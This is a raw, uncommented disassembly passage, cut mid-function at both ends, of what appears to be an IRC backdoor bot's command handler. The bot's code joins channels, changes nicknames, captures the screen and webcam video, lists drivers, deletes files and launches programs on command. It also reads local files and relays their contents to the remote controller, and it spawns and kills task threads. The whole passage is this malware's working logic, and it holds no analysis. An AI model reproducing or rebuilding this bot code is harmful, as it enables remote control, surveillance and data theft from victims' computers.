cmp eax, 400h
pop ecx
jge loc_409855
loc_408995: ; CODE XREF: sub_401ACD+7A56�j
lea eax, [ebp+var_2C4]
push eax
push offset dword_42A4BC
push [ebp+arg_10]
call sub_41B779
imul eax, 234h
pop ecx
push dword_43E59C[eax]
call sub_409A2D
jmp loc_404934
; ---------------------------------------------------------------------------
loc_4089C0: ; CODE XREF: sub_401ACD+49B8�j
; sub_401ACD+49CF�j
push [ebp+esi+var_84]
lea eax, [ebp+var_2C4]
push edi
push offset dword_42A4B0
push eax
call sub_41B886
push [ebp+arg_10]
call sub_41B779
add esp, 14h
jmp short loc_408979
; ---------------------------------------------------------------------------
loc_4089E6: ; CODE XREF: sub_401ACD+498A�j
; sub_401ACD+49A1�j
push edi
lea eax, [ebp+var_2C4]
push offset dword_42BB5C
push eax
call sub_41B886
mov esi, [ebp+arg_10]
push esi
call sub_41B779
add esp, 10h
test eax, eax
jle loc_409855
push esi
call sub_41B779
cmp eax, 400h
pop ecx
jge loc_409855
lea eax, [ebp+var_2C4]
push eax
push offset dword_42A4BC
push esi
call sub_41B779
imul eax, 234h
pop ecx
push dword_43E59C[eax]
call sub_409A2D
add esp, 0Ch
push edi
push esi
push offset dword_42A494
loc_408A4C: ; CODE XREF: sub_401ACD+700A�j
; sub_401ACD+7079�j ...
call sub_415221
jmp loc_404934
; ---------------------------------------------------------------------------
loc_408A56: ; CODE XREF: sub_401ACD+495C�j
; sub_401ACD+4973�j
cmp [ebp+var_C], ebx
jz loc_409855
push edi
push [ebp+var_C]
call sub_41B900
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_408A85
push esi
lea eax, [ebp+var_2C4]
push offset dword_42A48C
push eax
call sub_41B886
add esp, 0Ch
loc_408A85: ; CODE XREF: sub_401ACD+6FA1�j
mov edi, [ebp+arg_10]
push edi
call sub_41B779
test eax, eax
pop ecx
jle loc_409855
push edi
call sub_41B779
cmp eax, 400h
pop ecx
jge loc_409855
lea eax, [ebp+var_2C4]
push eax
push offset dword_42A4BC
push edi
call sub_41B779
imul eax, 234h
pop ecx
push dword_43E59C[eax]
call sub_409A2D
add esp, 0Ch
push esi
push edi
push offset dword_42A470
jmp loc_408A4C
; ---------------------------------------------------------------------------
loc_408ADC: ; CODE XREF: sub_401ACD+492E�j
; sub_401ACD+4945�j
cmp [ebp+var_C], ebx
jz loc_409855
push edi
push [ebp+var_C]
call sub_41B900
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_409855
mov edi, [ebp+arg_10]
push edi
call sub_41B779
test eax, eax
pop ecx
jle loc_409855
push edi
call sub_41B779
cmp eax, 400h
pop ecx
jge loc_409855
push esi
push offset dword_42A4BC
push edi
call sub_41B779
imul eax, 234h
pop ecx
push dword_43E59C[eax]
call sub_409A2D
add esp, 0Ch
push esi
push edi
push offset dword_42A454
jmp loc_408A4C
; ---------------------------------------------------------------------------
loc_408B4B: ; CODE XREF: sub_401ACD+4900�j
; sub_401ACD+4917�j
cmp [ebp+var_C], ebx
jz loc_409855
push [ebp+arg_10]
push [ebp+var_C]
call sub_41B900
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_409855
push esi
push offset aModeS ; "MODE %s\r\n"
push [ebp+arg_4]
call sub_409A2D
add esp, 0Ch
push esi
push offset unk_42A42C
jmp loc_40984E
; ---------------------------------------------------------------------------
loc_408B87: ; CODE XREF: sub_401ACD+48D2�j
; sub_401ACD+48E9�j
push [ebp+var_8C]
push offset dword_42D02C
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz loc_401E94
push edi
push offset dword_42A420
push [ebp+arg_4]
call sub_409A2D
push [ebp+arg_10]
call sub_41B779
imul eax, 3E8h
add esp, 10h
push eax
call dword_427078 ; Sleep
push [ebp+esi+var_84]
push edi
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_409A2D
push offset dword_42A40C
call sub_4151AD
jmp loc_403520
; ---------------------------------------------------------------------------
loc_408BEB: ; CODE XREF: sub_401ACD+48A4�j
; sub_401ACD+48BB�j
cmp [ebp+var_C], ebx
jz loc_409855
push [ebp+arg_10]
call sub_41AFE0
push [ebp+arg_8]
mov esi, eax
call sub_41AFE0
add eax, [ebp+var_C]
push edi
lea eax, [eax+esi+2]
push eax
call sub_41B900
mov esi, eax
add esp, 10h
cmp esi, ebx
jz loc_409855
push esi
lea eax, [ebp+var_2C4]
push offset dword_42AB40
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2C4]
push ebx
push eax
push [ebp+arg_10]
push [ebp+arg_4]
call sub_409A73
add esp, 20h
push esi
push [ebp+arg_10]
push offset unk_42A3F0
jmp loc_408A4C
; ---------------------------------------------------------------------------
loc_408C58: ; CODE XREF: sub_401ACD+4876�j
; sub_401ACD+488D�j
cmp [ebp+var_C], ebx
jz loc_409855
push [ebp+arg_10]
call sub_41AFE0
push [ebp+arg_8]
mov esi, eax
call sub_41AFE0
add eax, [ebp+var_C]
push edi
lea eax, [eax+esi+2]
push eax
call sub_41B900
mov esi, eax
add esp, 10h
cmp esi, ebx
jz loc_409855
push ebx
push ebx
push esi
push [ebp+arg_10]
push [ebp+arg_4]
call sub_409A73
add esp, 14h
push esi
push [ebp+arg_10]
push offset unk_42A3D0
jmp loc_408A4C
; ---------------------------------------------------------------------------
loc_408CAD: ; CODE XREF: sub_401ACD+4848�j
; sub_401ACD+485F�j
cmp [ebp+var_C], ebx
jz loc_401E94
push edi
push [ebp+var_C]
call sub_41B900
pop ecx
cmp eax, ebx
pop ecx
jz loc_401E94
push eax
push [ebp+arg_10]
call sub_4150B5
pop ecx
pop ecx
push [ebp+arg_10]
push offset unk_42A3B0
loc_408CDC: ; CODE XREF: sub_401ACD+5853�j
; sub_401ACD+7B2B�j
lea eax, [ebp+var_2C4]
push eax
call sub_41B886
add esp, 0Ch
jmp loc_409610
; ---------------------------------------------------------------------------
loc_408CF0: ; CODE XREF: sub_401ACD+481A�j
; sub_401ACD+4831�j
push edi
push [ebp+arg_10]
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_4184E2
jmp loc_4040FD
; ---------------------------------------------------------------------------
loc_408D0A: ; CODE XREF: sub_401ACD+47DC�j
; sub_401ACD+47F1�j
push [ebp+arg_10]
push [ebp+arg_1C]
call sub_41B900
pop ecx
test eax, eax
pop ecx
jz loc_409855
mov esi, [ebp+esi+var_88]
cmp esi, ebx
jz loc_408DB2
push esi
push [ebp+var_C]
call sub_41B900
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_408D9A
push esi
lea eax, [ebp+var_2C4]
push [ebp+var_88]
push [ebp+var_8C]
push [ebp+var_90]
push offset dword_42A604
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push 1FFh
push eax
push [ebp+arg_0]
call sub_41B5F0
add esp, 24h
lea eax, [ebp+var_2C4]
push esi
push [ebp+arg_10]
push offset unk_42A388
push eax
call sub_41B886
add esp, 10h
inc [ebp+arg_24]
jmp loc_40877B
; ---------------------------------------------------------------------------
loc_408D9A: ; CODE XREF: sub_401ACD+7270�j
lea eax, [ebp+var_2C4]
push offset unk_42A358
push eax
call sub_41B886
pop ecx
pop ecx
jmp loc_40877B
; ---------------------------------------------------------------------------
loc_408DB2: ; CODE XREF: sub_401ACD+725B�j
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push [ebp+arg_4]
push [ebp+arg_1C]
push eax
call sub_41ACF7
add esp, 0Ch
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409A73
add esp, 14h
lea eax, [ebp+var_2C4]
push [ebp+arg_10]
push offset dword_42A33C
push 200h
push eax
call sub_41B980
add esp, 10h
jmp loc_40877B
; ---------------------------------------------------------------------------
loc_408DFE: ; CODE XREF: sub_401ACD+47B2�j
; sub_401ACD+47C7�j
push offset aScreen ; "screen"
push [ebp+arg_10]
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_408E59
mov edi, [ebp+esi+var_88]
cmp edi, ebx
jz short loc_408E46
push edi
call sub_4153BD
cmp eax, 1
pop ecx
jnz short loc_408E3F
push edi
lea eax, [ebp+var_2C4]
push offset unk_42A308
push eax
call sub_41B886
add esp, 0Ch
jmp short loc_408E59
; ---------------------------------------------------------------------------
loc_408E3F: ; CODE XREF: sub_401ACD+7359�j
push offset unk_42A2D8
jmp short loc_408E4B
; ---------------------------------------------------------------------------
loc_408E46: ; CODE XREF: sub_401ACD+734D�j
push offset unk_42A29C
loc_408E4B: ; CODE XREF: sub_401ACD+7377�j
lea eax, [ebp+var_2C4]
push eax
call sub_41B886
pop ecx
pop ecx
loc_408E59: ; CODE XREF: sub_401ACD+7342�j
; sub_401ACD+7370�j
push offset aDrivers ; "drivers"
push [ebp+arg_10]
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_408EE6
xor edi, edi
loc_408E6E: ; CODE XREF: sub_401ACD+7404�j
lea eax, [ebp+var_53F8]
push 1FFh
push eax
lea eax, [ebp+var_4EF0]
push 0FFh
push eax
push edi
call ds:dword_4CB684
test eax, eax
jz short loc_408ECD
lea eax, [ebp+var_53F8]
push eax
lea eax, [ebp+var_4EF0]
push eax
push edi
lea eax, [ebp+var_5D88]
push offset unk_42A26C
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_5D88]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409A73
add esp, 28h
loc_408ECD: ; CODE XREF: sub_401ACD+73C2�j
inc edi
cmp edi, 0Ah
jl short loc_408E6E
lea eax, [ebp+var_2C4]
push offset unk_42A244
push eax
call sub_41B886
pop ecx
pop ecx
loc_408EE6: ; CODE XREF: sub_401ACD+739D�j
push offset aFrame ; "frame"
push [ebp+arg_10]
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_408F87
cmp [ebp+esi+var_88], ebx
jz short loc_408F74
cmp [ebp+esi+var_84], ebx
jz short loc_408F74
mov edi, [ebp+esi+var_80]
cmp edi, ebx
jz short loc_408F74
mov eax, [ebp+esi+var_7C]
cmp eax, ebx
jz short loc_408F74
push eax
call sub_41B779
pop ecx
push eax
push edi
call sub_41B779
pop ecx
push eax
push [ebp+esi+var_84]
call sub_41B779
pop ecx
push eax
push [ebp+esi+var_88]
call sub_4155F8
add esp, 10h
test eax, eax
jnz short loc_408F6D
push [ebp+esi+var_88]
lea eax, [ebp+var_2C4]
push offset unk_42A210
push eax
call sub_41B886
add esp, 0Ch
jmp short loc_408F87
; ---------------------------------------------------------------------------
loc_408F6D: ; CODE XREF: sub_401ACD+7481�j
push offset unk_42A1DC
jmp short loc_408F79
; ---------------------------------------------------------------------------
loc_408F74: ; CODE XREF: sub_401ACD+7437�j
; sub_401ACD+7440�j ...
push offset unk_42A1A4
loc_408F79: ; CODE XREF: sub_401ACD+74A5�j
lea eax, [ebp+var_2C4]
push eax
call sub_41B886
pop ecx
pop ecx
loc_408F87: ; CODE XREF: sub_401ACD+742A�j
; sub_401ACD+749E�j
push offset aVideo ; "video"
push [ebp+arg_10]
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_40875A
mov eax, [ebp+esi+var_88]
cmp eax, ebx
mov [ebp+arg_1C], eax
jz short loc_40901F
mov eax, [ebp+esi+var_84]
cmp eax, ebx
mov [ebp+arg_0], eax
jz short loc_40901F
mov eax, [ebp+esi+var_80]
cmp eax, ebx
mov [ebp+arg_18], eax
jz short loc_40901F
mov edi, [ebp+esi+var_7C]
cmp edi, ebx
jz short loc_40901F
mov esi, [ebp+esi+var_78]
cmp esi, ebx
jz short loc_40901F
push esi
call sub_41B779
pop ecx
push eax
push edi
call sub_41B779
pop ecx
push eax
push [ebp+arg_18]
call sub_41B779
pop ecx
push eax
push [ebp+arg_0]
call sub_41B779
pop ecx
push eax
push [ebp+arg_1C]
call sub_4157F1
add esp, 14h
test eax, eax
jnz short loc_409015
push [ebp+arg_1C]
push offset unk_42A170
jmp loc_40874B
; ---------------------------------------------------------------------------
loc_409015: ; CODE XREF: sub_401ACD+7539�j
push offset unk_42A130
jmp loc_4090E3
; ---------------------------------------------------------------------------
loc_40901F: ; CODE XREF: sub_401ACD+74DD�j
; sub_401ACD+74EB�j ...
push offset unk_42A0F0
jmp loc_4090E3
; ---------------------------------------------------------------------------
loc_409029: ; CODE XREF: sub_401ACD+4042�j
; sub_401ACD+4057�j
push offset aR ; "r"
push [ebp+arg_10]
call sub_41B4C2
mov edi, eax
pop ecx
cmp edi, ebx
pop ecx
jz short loc_409099
mov esi, 200h
push edi
lea eax, [ebp+var_2C4]
push esi
push eax
call sub_41BB4F
add esp, 0Ch
loc_409054: ; CODE XREF: sub_401ACD+75B6�j
test eax, eax
jz short loc_409085
push 1
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409A73
push edi
lea eax, [ebp+var_2C4]
push esi
push eax
call sub_41BB4F
add esp, 20h
jmp short loc_409054
; ---------------------------------------------------------------------------
loc_409085: ; CODE XREF: sub_401ACD+7589�j
push edi
call sub_41B05B
pop ecx
push [ebp+arg_10]
push offset unk_42A0CC
jmp loc_409227
; ---------------------------------------------------------------------------
loc_409099: ; CODE XREF: sub_401ACD+756F�j
push [ebp+arg_10]
push offset unk_42A0A8
jmp loc_406CD0
; ---------------------------------------------------------------------------
loc_4090A6: ; CODE XREF: sub_401ACD+4018�j
; sub_401ACD+402D�j
cmp [ebp+var_C], ebx
jz loc_409855
push [ebp+arg_10]
push [ebp+var_C]
call sub_41B900
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_409855
push offset asc_42A0A4 ; "\n"
push esi
call sub_41BEC0
push esi
call sub_419A51
add esp, 0Ch
test eax, eax
jnz short loc_4090F6
push offset unk_42A078
loc_4090E3: ; CODE XREF: sub_401ACD+754D�j
; sub_401ACD+7557�j ...
lea eax, [ebp+var_2C4]
push eax
call sub_41B886
pop ecx
pop ecx
jmp loc_40875A
; ---------------------------------------------------------------------------
loc_4090F6: ; CODE XREF: sub_401ACD+760F�j
push esi
lea eax, [ebp+var_2C4]
push offset dword_42A060
push eax
call sub_41B886
add esp, 0Ch
jmp loc_40877B
; ---------------------------------------------------------------------------
loc_409110: ; CODE XREF: sub_401ACD+3FEE�j
; sub_401ACD+4003�j
cmp [ebp+var_C], ebx
jz loc_409855
push [ebp+arg_10]
push [ebp+var_C]
call sub_41B900
pop ecx
cmp eax, ebx
pop ecx
jz loc_409855
push eax
call sub_418212
test eax, eax
pop ecx
jnz short loc_409140
push offset unk_42A040
jmp short loc_4090E3
; ---------------------------------------------------------------------------
loc_409140: ; CODE XREF: sub_401ACD+766A�j
push offset dword_42A024
jmp short loc_4090E3
; ---------------------------------------------------------------------------
loc_409147: ; CODE XREF: sub_401ACD+3FC4�j
; sub_401ACD+3FD9�j
push 7Fh
lea eax, [ebp+var_2080]
push [ebp+arg_10]
push eax
call sub_41B5F0
mov esi, [ebp+esi+var_88]
add esp, 0Ch
cmp esi, ebx
jz short loc_409178
push 7Fh
lea eax, [ebp+var_2000]
push esi
push eax
call sub_41B5F0
add esp, 0Ch
loc_409178: ; CODE XREF: sub_401ACD+7697�j
push 7Fh
lea eax, [ebp+var_1F80]
push [ebp+var_88]
push eax
call sub_41B5F0
mov eax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_2084], eax
mov eax, [ebp+var_8]
push [ebp+arg_10]
mov [ebp+var_1EFC], eax
mov eax, [ebp+var_4]
mov [ebp+var_1EF8], eax
lea eax, [ebp+var_2C4]
push offset dword_42A00C
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2C4]
push 1Ch
push eax
call sub_40B0F7
add esp, 18h
mov [ebp+var_1F00], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_2084]
push ebx
push eax
push offset sub_41ADB6
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, [ebp+var_1F00]
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz short loc_40921B
loc_409205: ; CODE XREF: sub_401ACD+774C�j
cmp [ebp+var_1EF4], ebx
jnz loc_406D00
push 32h
call dword_427078 ; Sleep
jmp short loc_409205
; ---------------------------------------------------------------------------
loc_40921B: ; CODE XREF: sub_401ACD+7736�j
call dword_42708C ; RtlGetLastWin32Error
push eax
push offset unk_429FCC
loc_409227: ; CODE XREF: sub_401ACD+29CF�j
; sub_401ACD+75C7�j
lea eax, [ebp+var_2C4]
push eax
call sub_41B886
add esp, 0Ch
jmp loc_406D00
; ---------------------------------------------------------------------------
loc_40923B: ; CODE XREF: sub_401ACD+3F9A�j
; sub_401ACD+3FAF�j
push ebx
push [ebp+var_88]
push [ebp+arg_4]
push [ebp+arg_10]
call sub_40F96B
add esp, 10h
push [ebp+arg_10]
push offset dword_429FB4
jmp loc_40984E
; ---------------------------------------------------------------------------
loc_40925D: ; CODE XREF: sub_401ACD+3F70�j
; sub_401ACD+3F85�j
push 14h
lea eax, [ebp+var_1D48]
push ebx
push eax
call sub_41B590
add esp, 0Ch
lea eax, [ebp+var_1D34]
push [ebp+arg_10]
push offset aS_2 ; "%s"
push eax
call sub_41B886
mov eax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_1D50], eax
lea eax, [ebp+var_C4]
push eax
lea eax, [ebp+var_1C30]
push 80h
push eax
call sub_41B980
mov eax, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_1BA8], eax
mov eax, [ebp+var_8]
mov [ebp+var_1BA4], eax
lea eax, [ebp+var_1C30]
push eax
lea eax, [ebp+var_1D34]
push eax
lea eax, [ebp+var_2C4]
push offset unk_429F90
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_2C4]
push 1Ah
push eax
call sub_40B0F7
add esp, 1Ch
mov [ebp+var_1BAC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1D50]
push ebx
push eax
push offset sub_415E1B
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, [ebp+var_1BAC]
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz loc_4023E6
loc_409326: ; CODE XREF: sub_401ACD+786D�j
cmp [ebp+var_1BA0], ebx
jnz loc_4083BD
push 32h
call dword_427078 ; Sleep
jmp short loc_409326
; ---------------------------------------------------------------------------
loc_40933C: ; CODE XREF: sub_401ACD+3F46�j
; sub_401ACD+3F5B�j
push [ebp+arg_10]
call dword_427080 ; DeleteFileA
test eax, eax
jz short loc_409367
push [ebp+arg_10]
lea eax, [ebp+var_2C4]
push offset dword_429F74
push 200h
push eax
call sub_41B980
jmp loc_409445
; ---------------------------------------------------------------------------
loc_409367: ; CODE XREF: sub_401ACD+787A�j
push offset dword_42A77C
call sub_41814D
pop ecx
push eax
jmp loc_403F48
; ---------------------------------------------------------------------------
loc_409378: ; CODE XREF: sub_401ACD+3F1C�j
; sub_401ACD+3F31�j
push [ebp+arg_10]
call sub_41B779
push eax
call sub_4199CA
pop ecx
pop ecx
push 1
pop esi
push [ebp+arg_10]
cmp eax, esi
jnz short loc_409399
push offset unk_429F50
jmp short loc_40939E
; ---------------------------------------------------------------------------
loc_409399: ; CODE XREF: sub_401ACD+78C3�j
push offset unk_429F20
loc_40939E: ; CODE XREF: sub_401ACD+78CA�j
lea eax, [ebp+var_2C4]
push eax
call sub_41B886
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz loc_406D03
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409A73
add esp, 14h
jmp loc_406D03
; ---------------------------------------------------------------------------
loc_4093D7: ; CODE XREF: sub_401ACD+3EF2�j
; sub_401ACD+3F07�j
push ebx
push ebx
push [ebp+arg_10]
push [ebp+var_4]
push ebx
push [ebp+arg_4]
call sub_4196BD
add esp, 18h
cmp eax, 1
push [ebp+arg_10]
jnz short loc_4093FD
push offset unk_429F00
jmp loc_406CD0
; ---------------------------------------------------------------------------
loc_4093FD: ; CODE XREF: sub_401ACD+7924�j
push offset unk_429ED0
jmp loc_406CD0
; ---------------------------------------------------------------------------
loc_409407: ; CODE XREF: sub_401ACD+3EC8�j
; sub_401ACD+3EDD�j
mov esi, [ebp+arg_10]
push esi
call ds:dword_4CB694 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+var_2D8], eax
jz short loc_40944D
push 2
lea eax, [ebp+var_2D8]
push 4
push eax
call ds:dword_4CB60C ; gethostbyaddr
cmp eax, ebx
jz short loc_409468
push dword ptr [eax]
loc_409433: ; CODE XREF: sub_401ACD+7999�j
push esi
lea eax, [ebp+var_2C4]
push offset unk_429EB0
push eax
call sub_41B886
loc_409445: ; CODE XREF: sub_401ACD+7895�j
add esp, 10h
jmp loc_406CDF
; ---------------------------------------------------------------------------
loc_40944D: ; CODE XREF: sub_401ACD+794D�j
push esi
call ds:dword_4CB6D8 ; gethostbyname
cmp eax, ebx
jz short loc_409468
mov eax, [eax+0Ch]
mov eax, [eax]
push dword ptr [eax]
call ds:dword_4CB6E0 ; inet_ntoa
push eax
jmp short loc_409433
; ---------------------------------------------------------------------------
loc_409468: ; CODE XREF: sub_401ACD+7962�j
; sub_401ACD+7989�j
push offset unk_429E88
jmp loc_4085D6
; ---------------------------------------------------------------------------
loc_409472: ; CODE XREF: sub_401ACD+3E9E�j
; sub_401ACD+3EB3�j
push 7Fh
push [ebp+arg_10]
push [ebp+arg_14]
call sub_41B5F0
add esp, 0Ch
push [ebp+arg_10]
push offset unk_429E60
jmp loc_4049EC
; ---------------------------------------------------------------------------
loc_40948F: ; CODE XREF: sub_401ACD+3E74�j
; sub_401ACD+3E89�j
push 5
push ebx
push ebx
push [ebp+arg_10]
push offset aOpen ; "open"
push ebx
call ds:dword_4CB5C0
push [ebp+arg_10]
test eax, eax
jz short loc_4094B3
push offset unk_429E40
jmp loc_406CD0
; ---------------------------------------------------------------------------
loc_4094B3: ; CODE XREF: sub_401ACD+79DA�j
push offset unk_429E1C
jmp loc_406CD0
; ---------------------------------------------------------------------------
loc_4094BD: ; CODE XREF: sub_401ACD+3E4A�j
; sub_401ACD+3E5F�j
mov eax, [ebp+arg_10]
mov cl, [eax]
mov byte_429094, cl
movsx eax, byte ptr [eax]
push eax
push offset unk_429DF4
jmp loc_4049EC
; ---------------------------------------------------------------------------
loc_4094D6: ; CODE XREF: sub_401ACD+3E20�j
; sub_401ACD+3E35�j
push [ebp+arg_10]
call sub_41B779
test eax, eax
pop ecx
jle loc_409855
push [ebp+arg_10]
call sub_41B779
cmp eax, 400h
pop ecx
jge loc_409855
push ebx
push ebx
lea eax, [ebp+var_A0]
push 2
push eax
call sub_40B08E
add esp, 10h
push eax
lea eax, [ebp+var_2C4]
push offset dword_42BB5C
push eax
call sub_41B886
add esp, 0Ch
jmp loc_408995
; ---------------------------------------------------------------------------
loc_409528: ; CODE XREF: sub_401ACD+3DF6�j
; sub_401ACD+3E0B�j
mov esi, [ebp+arg_10]
push esi
call sub_41B779
test eax, eax
pop ecx
jle loc_401E94
push esi
call sub_41B779
cmp eax, 400h
pop ecx
jge loc_401E94
push offset aQuitLater ; "QUIT :later\r\n"
push esi
call sub_41B779
imul eax, 234h
pop ecx
push dword_43E59C[eax]
call sub_409A2D
pop ecx
pop ecx
push 1F4h
call dword_427078 ; Sleep
push esi
call sub_41B779
imul eax, 234h
pop ecx
push dword_43E59C[eax]
call ds:dword_4CB6EC ; closesocket
push [ebp+var_10]
push esi
call sub_41B779
imul eax, 234h
pop ecx
push dword_43E5A4[eax]
call dword_4270AC ; TerminateThread
push esi
call sub_41B779
imul eax, 234h
push esi
mov dword_43E5A4[eax], ebx
call sub_41B779
imul eax, 234h
pop ecx
pop ecx
mov byte ptr dword_43E390[eax], bl
jmp loc_401E94
; ---------------------------------------------------------------------------
loc_4095D6: ; CODE XREF: sub_401ACD+3DCC�j
; sub_401ACD+3DE1�j
push [ebp+arg_10]
push offset aAll ; "all"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_409642
call sub_40B2C0
cmp eax, ebx
jle short loc_4095FD
push eax
push offset unk_429DC8
jmp loc_408CDC
; ---------------------------------------------------------------------------
loc_4095FD: ; CODE XREF: sub_401ACD+7B23�j
push offset unk_429DA0
loc_409602: ; CODE XREF: sub_401ACD+24FA�j
; sub_401ACD+2519�j ...
lea eax, [ebp+var_2C4]
push eax
call sub_41B886
pop ecx
pop ecx
loc_409610: ; CODE XREF: sub_401ACD+721E�j
cmp [ebp+var_8], ebx
jnz short loc_409631
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
loc_409629: ; CODE XREF: sub_401ACD+6DB5�j
call sub_409A73
add esp, 14h
loc_409631: ; CODE XREF: sub_401ACD+26F7�j
; sub_401ACD+2722�j ...
lea eax, [ebp+var_2C4]
push eax
call sub_4151AD
jmp loc_40207D
; ---------------------------------------------------------------------------
loc_409642: ; CODE XREF: sub_401ACD+7B1A�j
mov eax, [ebp+var_AC]
lea edi, [eax+1]
cmp edi, 20h
jnb loc_401E94
lea eax, [ebp+edi*4+var_90]
mov [ebp+arg_24], eax
loc_40965E: ; CODE XREF: sub_401ACD+7C02�j
mov eax, [ebp+arg_24]
mov esi, [eax]
cmp esi, ebx
jz loc_401E94
push esi
call sub_41B779
push eax
call sub_40B232
pop ecx
pop ecx
test eax, eax
push esi
jz short loc_409685
push offset unk_429D7C
jmp short loc_40968A
; ---------------------------------------------------------------------------
loc_409685: ; CODE XREF: sub_401ACD+7BAF�j
push offset unk_429D50
loc_40968A: ; CODE XREF: sub_401ACD+7BB6�j
lea eax, [ebp+var_2C4]
push eax
call sub_41B886
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_4096BA
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409A73
add esp, 14h
loc_4096BA: ; CODE XREF: sub_401ACD+7BCF�j
lea eax, [ebp+var_2C4]
push eax
call sub_4151AD
add [ebp+arg_24], 4
inc edi
cmp edi, 20h
pop ecx
jb short loc_40965E
jmp loc_401E94
; ---------------------------------------------------------------------------
loc_4096D6: ; CODE XREF: sub_401ACD+3DA2�j
; sub_401ACD+3DB7�j
cmp [ebp+var_C], ebx
jz loc_409855
push [ebp+arg_10]
push [ebp+var_C]
call sub_41B900
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_409855
push esi
push offset dword_42A4BC
push [ebp+arg_4]
call sub_409A2D
add esp, 0Ch
push esi
push offset dword_429D34
jmp loc_40984E
; ---------------------------------------------------------------------------
loc_409712: ; CODE XREF: sub_401ACD+3D78�j
; sub_401ACD+3D8D�j
push [ebp+arg_10]
push offset dword_42A420
push [ebp+arg_4]
call sub_409A2D
add esp, 0Ch
push [ebp+arg_10]
push offset unk_429D10
jmp loc_40984E
; ---------------------------------------------------------------------------
loc_409732: ; CODE XREF: sub_401ACD+3D4E�j
; sub_401ACD+3D63�j
push [ebp+esi+var_88]
push [ebp+arg_10]
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_409A2D
add esp, 10h
push [ebp+arg_10]
push offset unk_429CEC
jmp loc_40984E
; ---------------------------------------------------------------------------
loc_409759: ; CODE XREF: sub_401ACD+3D24�j
; sub_401ACD+3D39�j
push [ebp+arg_10]
push offset aNickS ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_409A2D
add esp, 0Ch
push [ebp+arg_10]
push offset unk_429CC8
jmp loc_40984E
; ---------------------------------------------------------------------------
loc_409779: ; CODE XREF: sub_401ACD+3164�j
; sub_401ACD+3179�j
push offset aQuitReconnecti ; "QUIT :reconnecting\r\n"
push [ebp+arg_4]
call sub_409A2D
pop ecx
lea eax, [ebp+var_2C4]
pop ecx
push [ebp+arg_10]
push offset unk_429CA4
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_4151AD
push [ebp+arg_10]
call sub_41B779
add esp, 14h
loc_4097B3: ; CODE XREF: sub_401ACD+7D34�j
push eax
call dword_427078 ; Sleep
loc_4097BA: ; CODE XREF: sub_401ACD+2AA3�j
xor eax, eax
jmp loc_401E97
; ---------------------------------------------------------------------------
loc_4097C1: ; CODE XREF: sub_401ACD+313A�j
; sub_401ACD+314F�j
push offset aQuitReconnecti ; "QUIT :reconnecting\r\n"
push [ebp+arg_4]
call sub_409A2D
pop ecx
lea eax, [ebp+var_2C4]
pop ecx
push [ebp+arg_10]
push offset unk_429C7C
push eax
call sub_41B886
lea eax, [ebp+var_2C4]
push eax
call sub_4151AD
push [ebp+arg_10]
call sub_41B779
add esp, 14h
imul eax, 3E8h
jmp short loc_4097B3
; ---------------------------------------------------------------------------
loc_409803: ; CODE XREF: sub_401ACD+EC9�j
; sub_401ACD+EDE�j
push [ebp+esi+var_8C]
xor eax, eax
cmp [ebp+var_8F0], bl
setnz al
push eax
lea eax, [ebp+var_338]
push dword_42909C
push eax
call sub_40B08E
add esp, 10h
lea eax, [ebp+var_338]
push eax
push offset aNickS ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_409A2D
add esp, 0Ch
lea eax, [ebp+var_338]
push eax
push offset unk_429C58
loc_40984E: ; CODE XREF: sub_401ACD+70B5�j
; sub_401ACD+778B�j ...
call sub_415221
pop ecx
loc_409854: ; CODE XREF: sub_401ACD+6CBA�j
pop ecx
loc_409855: ; CODE XREF: sub_401ACD+659�j
; sub_401ACD+665�j ...
mov eax, [ebp+arg_24]
jmp loc_401E97
; ---------------------------------------------------------------------------
loc_40985D: ; CODE XREF: sub_401ACD+AB4�j
; sub_401ACD+AC9�j
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
